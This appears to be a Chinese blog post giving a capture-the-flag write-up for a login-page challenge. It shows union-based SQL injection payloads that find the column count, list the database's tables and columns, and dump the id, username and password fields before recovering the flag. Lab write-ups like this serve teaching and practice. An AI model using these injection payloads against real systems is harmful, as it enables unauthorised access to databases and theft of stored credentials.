本文最后更新于 979 天前，其中的信息可能已经有所发展或是发生改变。

0x01 万能密码

首先尝试万能密码

并没有什么有用的信息

0x02 获得列数

那么开始爆库，已经提示 sqlmap 是没有灵魂的，还是手动注入吧

注意：在 URL 中 #需要替换成 %23，直接在地址栏输入 #无法正常返回结果

构造 payload

?username=1' order by 4%23&password=1

列数为 4

?username=1' union select 1,2,3%23&password=1

显位点为 2, 3

?username=1' union select 1,database(),version()%23&password=1

数据库名为 geek，版本为 10.3.18-MariaDB

?username=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=1

表名有 geekuser 和 l0ve1ysq1

?username=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'%23&password=1

geekuser 内列名有 id,username,password

?username=-1' union select 1,2,group_concat(id, username, password) from geekuser%23&password=1

geekuser 内没有什么有用的数据，看看 l0ve1ysq1

l0ve1ysq1 的列名和 geekuser 相同

?username=-1' union select 1,2,group_concat(id, username, password) from l0ve1ysq1%23&password=1

获得 flag

flag{ba3588ea-456f-45d3-b2ec-5ef9e2f91aa2}

发送评论编辑评论